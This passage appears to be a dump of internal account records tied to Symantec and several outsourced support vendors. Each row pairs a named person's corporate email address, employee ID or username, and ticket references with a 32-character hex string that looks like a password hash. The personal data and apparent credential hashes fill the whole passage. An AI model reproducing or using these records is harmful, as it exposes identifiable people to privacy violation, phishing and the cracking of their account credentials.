c.com,Symantec,da7d97d9cf18c081894b4ab7b95a46c3,Tripathy,<blank>,043852,Suchit,N
ULL,NULL,NULL
2a1-45dc-882e-4003cb202907,<blank>,091273,Vallie_Majors@symantec.com,Symantec,c6
efff63a9d15272b731cd2b81877303,Martinez,<blank>,091273,Michael,NULL,NULL,NULL
9c3-4afd-81be-c8ed0ef6b3a1,<blank>,EMPROV/2635069,tools_id@symantec.suth.com,Sut
herland,edc4a2bd1ff86acab5c6bdec4286a6b3,V,<blank>,092162,Kamalesh,NULL,NULL,NUL
L
4ce8-4921-88eb-76569fd98942,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,Sutherland,8bbb4c27329a93aa4c824b6fcaa4423d,VOmandam,<blank>,100482,Mike A
ndre,NULL,NULL,NULL
e057-4657-bec7-6acdb189b745,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,23d25ef6c37aae8bfea6177416c64ad0,Kumar E,<blank>,094975,Vijaya,NU
LL,NULL,NULL
efae-4d27-897a-c4ad38d79a31,<blank>,<blank>,nh.symantec@teleperformance.com.ar,<
blank>,09ec5924c6f10752837e3a689fa642db,DEBIA TEIXEIRA,<blank>,108620,ALESSANDRA
,NULL,NULL,NULL
87ba-4f1c-84d5-674550dc88ca,<blank>,EMPROV,accounts@symantec.teleperformance.gr,
TPG,b2fcada15ead76ba6ad397ee53077152,Mentas,<blank>,083935,Ioannis,NULL,NULL,NUL
L
bb5-4f13-bd60-2313d9c91c81,<blank>,76548,lisa.liu@clts.cn,CLTS,0b7165b095d931be3
7d31cac89d2a1e4,Liu,<blank>,Lisa_Liu,Lisa,NULL,NULL,NULL
9d3d-41a4-8b91-5502cfbeb539,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
sutherland,39a08bd9e8c2a012482a3676b0a39f27,Sankunny,<blank>,074984,Anoop,NULL,N
ULL,NULL
406-46bb-8be9-7c8ea698b7d8,<blank>,<blank>,tools_id@symantec.suth.com,Symantec,b
111f51132cf5a4bae3cef059e458dba,Msuth,<blank>,091235,Karthik,NULL,NULL,NULL
e69-4382-8668-1704a62a47ea,<blank>,87804,accounts@symantec.teleperformance.gr,TP
G,6d92c8ae6e28776f1c73265bc4a7cf5d,Barska,<blank>,ioanna_barska,Ioanna,NULL,NULL
,NULL
4be-41e0-b45e-7e6bd603c0c0,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,f9c9ddb3e26778be948100c9c88ba717,BrijeshM,<blank>,093025,Richard,NULL,NULL,NULL
7eec-4d11-93dd-43028720d0b1,<blank>,EMPROV/CRQ7505,Richard_O_Sullivan@symantec.c
om,Symantec,8969e6e74202bd80e1b8fc791bfcf8bd,O Sullivan,<blank>,093359,Richard,N
ULL,NULL,NULL
9e73-4ac6-b33a-37bd2d6a0977,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,2983cec6dcac884bb30e41f4085703d2,Marpa,<blank>,imee_marpa_cc,Imee ,NULL,N
ULL,NULL
807-4bb8-8725-1b723798690e,hvk 20 feb10,INC000000115728,accounts@symantec.telepe
rformance.gr,TPG,55a7ae1fe07882a2c40ee5603e997dd4,Schmidt,<blank>,093068,David,N
ULL,NULL,NULL
f8cb-4355-bd0e-5ffb0ff8f533,AY 10-08-2010,CRQ000000105918,Matthew_Halttunen@syma
ntec.com,<blank>,58fe3453563534a887586b1809ee3770,Halttunen,<blank>,052470,Matth
ew,NULL,NULL,NULL
5bb6-44fe-85a4-a6f0f2a5227b,hvk 26jan10,CRQ000000017352,tomas_rubacek@symantec.c
om,Symantec,84c7ef4fc233df440f7f9555653b1826,Rubacek,<blank>,068663,Tomas,NULL,N
ULL,NULL
a3ef-46c8-933a-9d2709de551f,CRQ000000236131,000-000,tools_id@symantec.suth.com,S
utherland,bd4fb71bcd5fc1a7f882e8b451dd9e07,Chua,<blank>,114697,Lawrencenicoli,NU
LL,NULL,NULL
53c-41c3-a296-73f68f2d4e09,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland,
5b2ce8ef71bafcfd6e2263bda3cd3d6a,ClaireCabal,<blank>,093219,Krystal,NULL,NULL,NU
LL
c043-4289-b71a-19ab3bc3e389,CRQ000000241079 PBP 15/04/2011,<blank>,Rajasekar_A@s
ymantec.com,Symantec,17168209a31d5d2c70ac9694756c3242,A,<blank>,114494,Rajasekar
,NULL,NULL,NULL
c9f7-415d-be6a-c96ce4bd2e62,CRQ000000241079 PBP 15/04/2011,<blank>,Sivachandran_
K@symantec.com,Symantec,bd42b2ce83144031a480886fb3e45427,K,<blank>,114778,Sivach
andran,NULL,NULL,NULL
4c33-4d92-9677-95cc852eac0a,CRQ000000241079 PBP 15/04/2011,<blank>,Bharathwaj_K_
J@symantec.com,Symantec,c0bcd81ab52c03eb68870e8fbe5d1689,K_J,<blank>,114393,Bhar
athwaj,NULL,NULL,NULL
7514-4931-9ecf-cd220eddc420,nam-08-08-2010,CRQ000000111143,tools_id@symantec.sut
h.com,Sutherland,45584d36b09fbac45d826f5cf75ade5d,Kumar,<blank>,108198,Arun,NULL
,NULL,NULL
bca3-4ff0-8825-0b9e77308325,CRQ000000241079 PBP 15/04/2011,<blank>,Srinivasan_Kr
ishnamu@symantec.com,Symantec,bdea479a9f1d7985e66f1b5933b55bb9,Krishnamu,<blank>
,114419,Srinivasan,NULL,NULL,NULL
6a5d-4b27-8400-e73a592f0097,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,821f548b250c3fca004bc426c5521cde,Madid,<blank>,sittie_madid_cc,Sittie,NUL
L,NULL,NULL
199f-4d05-b071-5990eb0c0fb3,SRB 27.08.2010,INC000000251655,tools_id@symantec.sut
h.com,Sutherland,1e926c359c1ec6a0b34df4fdfaa93642,Vardhan,<blank>,092180,Bhanu,N
ULL,NULL,NULL
f375-420d-bff6-2ae9d1c813fe,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,64f77767966a069b54c2e2f442f5e302,Lacsi,<blank>,094231,John Michael,NULL,NULL,N
ULL
617-44f3-9af5-072ea7735fb8,<blank>,EMPROV,tools_id@symantec.suth.com,Southerland
,5ab59a811d4b6f9c529955959e4a2316,Krishnan,<blank>,092194,Srinivasa ,NULL,NULL,N
ULL
808c-4e2d-a2cb-79e48ece9b51,<blank>,<blank>,Srirangammukundan_sr@symantec.com,<b
lank>,eef0b51687734eed1cb621a31b3796de,Mukundan,<blank>,108651,Srinivasan,NULL,N
ULL,NULL
7632-46a8-bd98-7887ca734679,<blank>,<blank>,gongjc@neusoft.com,<blank>,3f5213642
0972c476fbfc9b19a14912f,gong,<blank>,miya,jicheng,NULL,NULL,NULL
31b7-43bf-a318-5f3378a7e298,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,f78cdf53d02388bf5975a6c76a7f57ba,Ramachandran,<blank>,089313,Muru
gesan,NULL,NULL,NULL
375e-4f3c-9611-4321ac5f7207,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,5
a2ac1406f6124d78044910795532e8e,Dimaulatan,<blank>,111128,Emily,NULL,NULL,NULL
afc9-43fb-88dd-4eae7ca36180,PM - 8/8/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,d6bc12ef054d9833aaa30b61c82cff38,Ramani K,<blank>,119330,Prakash,NULL,NULL,
NULL
410d-49f0-94b8-48ec9a4898eb,BPR-11/12/09,INC70690,tools_id@symantec.suth.com,Sut
herland,57953206876968ee9a419a5748d262a6,D,<blank>,074409,Vijayakumar,NULL,NULL,
NULL
024b-4af4-a835-df330ebeb02b,CRQ000000315393--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,c09e611d36a02ec6f7c90e0ffd35a049,Huertas,<blank>,119284
,Cioza Mae Buenbrazo,NULL,NULL,NULL
af71-44e5-bd3d-3bb5fb09345f,CRQ000000315401---VMD--8/8/2011,000-000,tools_id@sym
antec.suth.com,Sutherland,7cc2338af16bf2114d5e66e1048fb422,Canillo,<blank>,11928
6,Janessa Villanueva,NULL,NULL,NULL
dbe2-4a1e-8895-360967387220,CRQ000000315420--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,cb21a2ae64af24ce7ef51a234b0eb154,M,<blank>,119290,Theri
rajan,NULL,NULL,NULL
0214-43f9-9e58-477f7ca9110b,CRQ000000315428--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,01ad2051926d471a182129d59f1d56e6,M,<blank>,119293,Mithe
sh,NULL,NULL,NULL
17fd-4d59-867e-bf8835d29ccf,<blank>,<blank>,daniel_hartnell@symantec.com,Symante
c,26b40a88e577462de5d0c4a40e2e5758,Hartnell,<blank>,daniel_hartnell,Daniel,NULL,
NULL,NULL
42ca-4a30-a71e-18b7c16127f3,<blank>,503-614-7919,kevin_kerwien@symantec.com,Syma
ntec,20dea5d7805e8850517b40528d10c249,Kerwien,<blank>,kevin_kerwien_en,Kevin,NUL
L,NULL,NULL
5031-49de-b910-f13ea2a8368e,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,f9e50013bced4787fc459c3ea88d5ad8,KumarP,<blank>,kiran_kumarp_cc,Kiran ,NU
LL,NULL,NULL
626f-42cc-9d9d-b1ebdb1ed9f8,CRQ000000322830-CLNP-18/08/2011,000-0000,abhijitanan
d_srivast@symantec.suth.com,Sutherland,1233b10175246a87971b8925db6c261b,Srivasta
va,<blank>,119707,Abhijit Anand,NULL,NULL,NULL
b434-4cc3-937d-4c675cbbc142,MI - 10/04/2010,<blank>,tools_id@symantec.suth.com,S
utherland,4637c7f593aa6023cf6ba358f86a4474,Gizelle Tiongco,<blank>,109099,Ma. Ka
trina,NULL,NULL,NULL
5bf6-44f0-b9db-831d497510d6,CRQ000000325443--VMD--23/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,7c8d47157f65a96bf6dcaaa72d921b64,Villanueva,<blank>,1
01796,Ronald,NULL,NULL,NULL
1b7-45e6-954c-2850696eba24,<blank>,EMPROV,abhijit_dey@symantec.com,Symantec,7c55
2a150ae883fd952c7fb046ecc0f5,Vaithianathan,<blank>,079581,SrivenkateshKumar,NULL
,NULL,NULL
49a4-47de-adac-9cab1c31700a,sms 01.10,INC153788,tools_id@symantec.suth.com,Suthe
rland,178b07e325687d3c18721940f8f62efe,Joshi,<blank>,095015,Arjun,NULL,NULL,NULL
343-425b-ab3e-7bb6e2e05ce2,<blank>,075832,Tools_id@symantec.suth.com,Symantec,00
304a7a31d3eeccc7324fc2970b8b6e,Paul,<blank>,shaina_paul,Shaina,NULL,NULL,NULL
d45-4935-8a72-581edd5bdb77,<blank>,EMPROV,tools_id@symantec.suth.com,Southerland
,081732bd26c43b93f3598ff7e4a04c07,KumarYV,<blank>,092203,Sumanth ,NULL,NULL,NULL
e06e-4b0c-bd28-77053f949644,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,7c890154e3ac473ea36b9870d2a2c054,Cabradilla,<blank>,mark_cabradilla_cc,Ma
rk ,NULL,NULL,NULL
fe39-41d2-a6bc-294c4ec93851,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,130badf9d09a6d5b2e8be32a4cf762cc,Lamentac,<blank>,eric_lamentac_cc,Eric ,
NULL,NULL,NULL
84d2-4676-9473-b9566b1b6f4d,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,fcfd582cc2daa8f48f7eedc482d91f8e,Samson,<blank>,carlo_samson_cc,Carlo,NUL
L,NULL,NULL
323-4f7a-9f8f-c07599256f3a,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,Ipcdoctor.c
o.kr,013a897416cc4633ddf7037d30df2251,Kinoshita,<blank>,084533,Miki ,NULL,NULL,N
ULL
062-4cc1-8169-a39be7e72338,<blank>,<blank>,mara_solano@symantec.com,Symantec,a73
87a5b1d9f8835934b45aeff108940,Solano,<blank>,mara_solano,Mara,NULL,NULL,NULL
f820-4c80-8de7-6a9b366a6bb3,CRQ000000322797-CLNP-18/08/2011,000-0000,hiteshkanti
lal_parma@symantec.suth.com,Sutherland,1dc8c0a0dd6dc12b39d9aad4174bb9a3,Parmar,<
blank>,119698,Hitesh Kantilal,NULL,NULL,NULL
c3d2-4c1e-b037-043454880ccd,CRQ000000322800-CLNP-18/08/2011,000-0000,imranyasin_
tejani@symantec.suth.com,Sutherland,b66737bb7f3bbffb381e4cbf9d444518,Tejani,<bla
nk>,119699,Imran Yasin,NULL,NULL,NULL
506f-49ee-8321-4925cabdbe73,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,08d408f9fb71e552c38fbe0b896d9abc,Gopalarathnam,<blank>,098446,Vijay,N
ULL,NULL,NULL
0922-4c40-a67e-d40eed0e74b4,CRQ000000107687,hvk 15 Aug 2010,chaithanya_k_s@syma
ntec.com,Symantec,0c37d3764ec59e8fc0edb4220f1e3cb0,K S,<blank>,107006,Chaithanya
,NULL,NULL,NULL
53dc-4c20-8765-c78ef742c329,CRQ000000221880 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,67bac41c81b4b12e194aa82fc4800aaf,Kiran Malamel,<blank>
,113997,Anto,NULL,NULL,NULL
3c75-4901-891e-022e3fa3d69f,CRQ000000221930 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,d140000ec701777c25086b61311b0abe,Puthenveettil joy,<bla
nk>,114000,Nelsen,NULL,NULL,NULL
0b65-4417-9abf-6c2b119262ba,CRQ000000322834-CLNP-18/08/2011,000-0000,vishal_shin
de1@symantec.suth.com,Sutherland,adb6e9be40ce85842a7c17cee62850dc,Shinde,<blank>
,119708,Vishal,NULL,NULL,NULL
8e97-416d-98e3-9db368922a18,CRQ000000221982 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,7ab5d0c2f8d197f9cc7e01427bd49248,Chandruparambil Job,<b
lank>,114005,Vipin,NULL,NULL,NULL
9438-4b27-9e1a-5c51689afa9d,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,3cb6d79719062a9af254bf6a4f8fcdb8,Gaspay,<blank>,abigail_gaspay_cc,Abigail
,NULL,NULL,NULL
6354-490a-ae74-560772f9b3c8,SRB 27.08.2010,INC000000251655,tools_id@symantec.sut
h.com,Sutherland,83ea9040ef107ffed96e7f9e7b5e9b1c,Patro,<blank>,092135,Anil Kuma
r,NULL,NULL,NULL
4938-43f3-a497-ef23b04064f7,08/042010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,Su
therland,4e3f908b7cf9ffade824c03c9d84e2b1,Paul,<blank>,103060,Cristina,NULL,NULL
,NULL
c71c-425f-a3a2-63aa0fee83c9,nam-08-12-2010,CRQ000000107016,nh.symantec@teleperfo
rmance.com.ar,Teleperformance Argentina,562be92cacab3f0fa9b362bb706621b0,Dos San
tos Bastista,<blank>,107955, Grasiely,NULL,NULL,NULL
b2cc-48c8-bd7b-eda3ca27c986,<blank>,INC000000154002,symantec_2nd_maa@tp-tec.nl,T
eleperformance,b9129372a2652724adf9548b0ce9d745,Tarbuk,<blank>,071623,Zarko,NULL
,NULL,NULL
b56b-4841-a1a5-35a22d8a2b92,SSS 02.04.10,INC000000144786,tools_id@symantec.suth.
com,Sutherland,fe70de342720bebec9505b126ec17012,Kumar,<blank>,096839,Kiran,NULL,
NULL,NULL
0dc-4555-9266-3a52429b281c,<blank>,88603,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",b9d143d6c343d1964cdd4acfa0ff775d,Jaramee Cunanan,<blank>,
ladyjaramee_cunanan,Lady,NULL,NULL,NULL
16d1-4f2a-be68-03ac9976db0d,<blank>,EMPROV,Tools_Id@symantec.Suth.com,Sutherland
,4e8feac78ffcf5480e17243310112f04,BabuY,<blank>,091703,Chitti,NULL,NULL,NULL
ff39-44b1-b3f2-28072d9272e9,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,bd7dce5e512d49e9e9f0d15960cf84f0,Borade,<blank>,074756,Chaitrali,NULL,NUL
L,NULL
5db6-4a76-b987-92aad49b87a4,CRQ000000265000--VMD-25/052011,<blank>,S_Dayanand@sy
mantec.com,SYMANTEC,7f07e02b1ced875fe3fde86449d75e8d,Dayanand,<blank>,114497,S,N
ULL,NULL,NULL
2018-448b-9c98-a3c7a5292f52,<blank>,<blank>,david_greaves@symantec.com,Symantec,
d0a161a66e639855e17a5c8885c74adf,Greaves,<blank>,david_greaves,David,NULL,NULL,N
ULL
ded9-4982-988c-b330186d477a,CRQ000000367402-CLNP-21/10/2011,000-0000,thomas_pass
mann@teleperformance.nl,Teleperformance,ed3af2da2e938d1a0f80ad4a08b4f10b,Passman
n,<blank>,121615,Thomas,NULL,NULL,NULL
aad3-4032-b5b2-dd0e38c27dd5,CRQ000000204567 - PR - 2/18/2011,<blank>,Kishorekuma
r_K@symantec.com,<blank>,5d6c77470fcbcb68f57818295fb3c4d6,K,<blank>,113032,Kisho
rekumar,NULL,NULL,NULL
bdf1-4716-afbf-e7f1deaaa541,CRQ000000265000--vmd-25/05/2011,<blank>,K_Ramachanra
n@symantec.com,SYMANTEC,cb1cc2307a41d90c7de87f48ee4675d2,Ramachandran,<blank>,11
4478,K,NULL,NULL,NULL
ddff-47dd-9498-280fb51a1808,01/03/2010 - SPJ,INC121791,Tools_Id@symantec.Suth.co
m,Sutherland,475b4e62e42b908e8e3f1b3178b5f94b,Vipin,<blank>,086218,V,NULL,NULL,N
ULL
e567-4615-8830-fe166f037b72,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,e27c124e8be93ddb99a7e960d157bf9e,Kumbi,<blank>,085727,Nancy,NULL,NULL,NULL
dddd-45c1-8078-39b147d8cc12,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,441aa48cdeeda64e0c1a8caa3d26031d,Prendi,<blank>,083126,Suela,NULL,NULL,NULL
bd1-4fff-b203-c549ff71725d,WS 23-07-2010,INC000000224391,Padmavathy_Ravikumar@Sy
mantec.com,Symantec,4ca7e3f171495ab73db58e5c2fa98558,R,<blank>,093171,Padmavathy
,NULL,NULL,NULL
b940-42e9-908a-e4e277eade3c,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,31a0f7f85a57951273d1ae64d52b808d,Regalado,<blank>,100962,MylaLee,NULL
,NULL,NULL
a5f3-4c6f-8576-5aea98c051d2,13/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,a1810c49331369cb442f3005e0f3e1ce,Edakkavu,<blank>,105214,Arjun,NULL,NU
LL,NULL
98e-4a46-b697-350b16e2315e,<blank>,092207,tools_id@symnatec.suth.com,Sutherland,
16212ebb7bc8e238603aac78ff532bb1,KumarV,<blank>,092207,Siva,NULL,NULL,NULL
ca7-4096-a926-aa72f14bda7d,<blank>,89625,symaccounts@e4e.com,e4e,5e8106176a24134
dd709e3befede2f70,Prakash,<blank>,naveen_prakash,Naveen,NULL,NULL,NULL
112-42e4-8e55-8ee9c846045c,<blank>,EMPROV,Suchit_Tripathy@symantec.com,Symantec,
787431009346e3f446a81fdbf877b409,Davala,<blank>,092451,Deepa,NULL,NULL,NULL
c100-4880-80b0-dc0358dae9bb,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,ae34163f4012bd2c2394d168ef7c4046,Purswani,<blank>,gay_purswani_cc,Gay ,NU
LL,NULL,NULL
9f2e-4362-a749-35f02a2e8a93,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,eb411d55644839078db192d6680f6a46,Cariaga,<blank>,simon_cariaga_cc,Simon ,
NULL,NULL,NULL
9ec1-4583-a329-4f997b1ba895,SRB 24.08.2010,INC000000249136,tools_id@symantec.sut
h.com,Sutherland,41c60dabcc0eb6d5448c17037c149e25,Devarinti,<blank>,100929,Venka
t Ramana,NULL,NULL,NULL
d453-486e-840e-0c2a653e7c3d,sms 29,INC213497,tools_id@symantec.suth.com,<blank>,
ac1e24f5626da2308e819aad2aa7d38c,Bharati,<blank>,074768,Shravan,NULL,NULL,NULL
2cbd-4646-aa5f-76a0c6caca75,NA 11th July -2011,CRQ000000296380,ramesh_mohan2@sym
antec.com,Symantec,ba1129451096615b65c170f64605a364,Mohan,<blank>,117252,Ramesh,
NULL,NULL,NULL
87f9-48ef-81ec-6a2235888dce,BPR-02-02-10,EMPROV,symantec_2nd_maa@tp-tec.nl,Telep
erformance,b066b4b56c43fa6855d88c784a527404,Renrusun,<blank>,098899,Edward,NULL,
NULL,NULL
f438-4ddb-8d85-5dab71cba2c3,CRQ000000107687,hvk 15 Aug 2010,GaneshBhushan_Misra@
symantec.com,Symantec,6dfdba8185c9ffe82249e6ad606e8962,Misra,<blank>,106224,Gane
sh Bhushan,NULL,NULL,NULL
7d12-4a25-8843-c6f62a72d21d,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,ffc3f33d57aaa81c6f1c0a54d88d89bf,Daggon,<blank>,093224,Pearl Ann,NULL
,NULL,NULL
620-4179-92e9-236aa2ed62ac,bpr-14-06-10,EMPROV/INC194064,Suchit_Tripathy@symante
c.com,Symantec,8fe41466722e9d0bbc81963afcc7db5b,SPatel,<blank>,092622,Maulik,NUL
L,NULL,NULL
eff3-4523-a88b-d75f471e0ac0,<blank>,<blank>,liuqn@neusoft.com,<blank>,01cfe16a17
fff3fafe4903ebc6f4314f,liu,<blank>,92491,qiannan,NULL,NULL,NULL
b618-4da8-872d-842eb2c27aed,12/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Com,Suther
land,9926df27d3b87796b08bd19c5f62e254,Toriano,<blank>,104941,NeanGiles Tirazona,
NULL,NULL,NULL
e0f0-496a-af8c-b03a384a22c2,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,7155700e783cfbdf5d786a263256cb0b,Obeneta,<blank>,097853,ElizerSebumpa
n,NULL,NULL,NULL
6474-4f0d-8ef2-5ecff0244754,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,399129232e7ae17cdac10c95954a47d7,Nakka,<blank>,092178,Kiran,NULL,NU
LL,NULL
3e89-4d69-81df-868e3dc63315,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,4a954db25a4061970004779b2aa483d4,MIchael,<blank>,074838,Stany,NULL,NULL,N
ULL
7f42-42ec-b44c-4ab468ce843b,bpr-02-06-10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,51d68b9cb2e8e3277a3eb8af8b2c4a24,Katari,<blank>,099856,Harish,NULL,NULL,NU
LL
d0e5-4a13-a4f6-07d14c7a74ea,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,f47c1c4634c9216c3cd4c71c1f64922e,Kumar V,<blank>,091723,Nathaniel,N
ULL,NULL,NULL
4b4f-488c-a590-f9bf88b429ef,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,9
838daffd0d40e2386c90a57a728f5c7,Philip,<blank>,111717,Subin Mohan,NULL,NULL,NULL
b7e4-4849-bc0f-d33a6b007b61,<blank>,<blank>,mac_moyer@symantec.com,Symantec,92d8
c239950b057470c56a28f68ab922,Moyer,<blank>,mac_moyer,Mac,NULL,NULL,NULL
f62e-4a7d-8ee5-d7ec6acebe3c,SSS 01/02/10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,956abe6fcf528f46b7bbae3b12e61cda,Shajan FMadid,<blank>,096796,Sittie,NULL,
NULL,NULL
c21d-4c36-aef5-ee83f22b05a0,<blank>,<blank>,david_bunning@symantec.com,Symantec,
2eeb6b71732c7c9e51af13be8fc847bb,Bunning,<blank>,david_bunning,David,NULL,NULL,N
ULL
107f-4de2-a12a-f2e6ae7db878,SRB 08.06.2010,INC190024,tools_id@symantec.suth.com,
sutherland,58f0f2e3ae7cd3dc74e27000d58d283a,SudhirV,<blank>,090909,Krishna,NULL,
NULL,NULL
57ef-464b-afea-37249fba3915,CRQ000000275419-VMD-10-06-2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,398d698955b51ce83ac5eecd9358f19a,Princy,<blank>,117075,
Tresa ,NULL,NULL,NULL
b18-4298-89fc-d48d04dde4c0,<blank>,89759,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",78431cd906d6bc428050e07a747d820d,Mistry ,<blank>,shuven
du_mistry,Shuvendu,NULL,NULL,NULL
d135-4df8-a4c4-5ad88cf2983a,bpr-08-06-10,EMPROV,winnie_fu@symantec.com,Symantec,
1b71840f1156e49b7a0e68eaeb11b24f,Zhang,<blank>,105897,Jie,NULL,NULL,NULL
3226-4f68-9be1-2c066d73e1c5,CRQ000000458492 SP 19 12 2011,000-0000,Ali_Watouti@s
ymantec.com,Symantec,56a49774f01c32040132f2a3e5108b5b,Watouti,<blank>,114220,Ali
,NULL,NULL,NULL
11eb-41ba-bb01-915161264030,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,
9778eaf0ec84f7550edcaab0b0e6ace1,Kerwien,<blank>,kevin_kerwien_agent,Kevin,NULL,
NULL,NULL
f716-43e3-94bf-e8b2d0c17513,<blank>,EMPROV,symaccount@neusoft.com,Neusoft,d21ac1
eb49cb5bc0932e16cd46351868,Gao,<blank>,076371,Fengyun,NULL,NULL,NULL
9570-413f-85f0-922d20131732,NA 17 Mar 2011,CRQ000000220922,tools_id@symantec.sut
h.com,<blank>,fea4400778aa693cfd3cc698eb9a047d,Bandela,<blank>,113974,VishnuVard
han,NULL,NULL,NULL
e74c-4c71-aac1-9e03537640f5,CRQ000000220255,<blank>,tools_id@symantec.suth.com,K
SC-03/18/2011,1fb57f0c33f2aa1ba506656c739e4b2d,anupoju,<blank>,113857,yugandhar,
NULL,NULL,NULL
066-4520-aab8-f3d590cc9187,<blank>,89764,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",56cf1a51a4cf9fda2a70e83ef2ede72c,H ,<blank>,tukaram_h,T
ukaram,NULL,NULL,NULL
77ec-49d7-9b68-929b234dd987,nam-08-17-2010,CRQ000000110113,tools_id@symantec.sut
h.com,Sutherland,30bfa0984aa0626091ee1c8e263a5b6c,Menon,<blank>,106541,Hareesh,N
ULL,NULL,NULL
8e28-472c-a3ba-4f4ea841135f,CRQ000000265666--VMD--26/05/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,8b0dd4ada62d52cd32db4f1ae9040c17,Ponnaganti,<blank>,1
11380,Srinivas,NULL,NULL,NULL
2834-4dbc-b8ac-c488fdc56503,CRQ000000460060 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,5b514ff5e2429725f1108986165c9543,Hijara,<blank>,123197
,Arlene Nini,NULL,NULL,NULL
768e-49e9-950e-9cffdca6f842,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464917,2d802febe19c3ffbcf2629393b477088,Gabales,<blank>,123257,Joa
na Marie Inovero,NULL,NULL,NULL
c37c-44e8-91c0-8557e960ef38,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464920,2d1d869c5d6bca5b22e828b1dcef7883,Cuevas,<blank>,123258,Loui
s Camille Bacsal,NULL,NULL,NULL
63d3-4786-9ddc-86651c3cd393,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464941,1d0627b13e6bb147894de5751a17204f,Loyola,<blank>,123265,Chre
ystar Coyoca,NULL,NULL,NULL
a192-494d-8547-79ec9dc9660d,<blank>,<blank>,romina.ros@teleperformance.com.ar,RM
-22Dec-CRQ000000467194,f3ad76b97710420472f2935bc41c0b0b,Ros,<blank>,123497,Romin
a,NULL,NULL,NULL
ce1-46e2-a0d6-894626044803,<blank>,89790,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",77b389440436106195f337aa07906455,A ,<blank>,swetha_a,Sw
etha,NULL,NULL,NULL
2a2b-4d61-9635-fb7089718d2a,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,35995064aa611363cf1a85d98d6c7410,K,<blank>,090369,Nagendran,NULL,NULL
,NULL
0dd6-42e2-b29f-d36190217d4f,SRB 28.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherlands,9caff43aa32b619aa82a415f3a004f26,Ali,<blank>,104577,Zahirulla,NULL,N
ULL,NULL
6133-4076-ba1d-79742e87e58b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,bc2d3121cbe0a5871d15831ef60f3bf8,Felhaber,<blank>,085703,Wesley,NULL,NULL,NULL
241d-4735-b4ea-a1ec25bf0724,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,3d3b3ddd4556f41e5b72012318474f68,Agenor,<blank>,085705,Abner,NULL,NULL,NULL
ef62-40ed-a3f4-18ff63777d7d,SSS 27.05.10,INC182175,tools_id@symantec.suth.com,Su
therland,2824ac7f21e5fee17a0dee0a959d9a45,E,<blank>,096428,Moses,NULL,NULL,NULL
3528-4059-86e2-a3a923ac680a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,ad8f2db247762f197f5744c69181f08d,King,<blank>,085706,Meryl,NULL,NULL,NULL
328b-4ad0-a636-79379e645793,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,37cccfee169d172e390a1836abf4eceb,Chauvin,<blank>,085717,Michelle,NULL,NULL,NULL
a972-4454-bac3-7751d6677b2a,03/02/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,8ae4b7489bf49ef0e20ca5267bc63a43,Banerjee,<blank>,099161,Rajiv,NULL,NU
LL,NULL
4ee6-4c5f-ad1a-390e8c621e6f,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
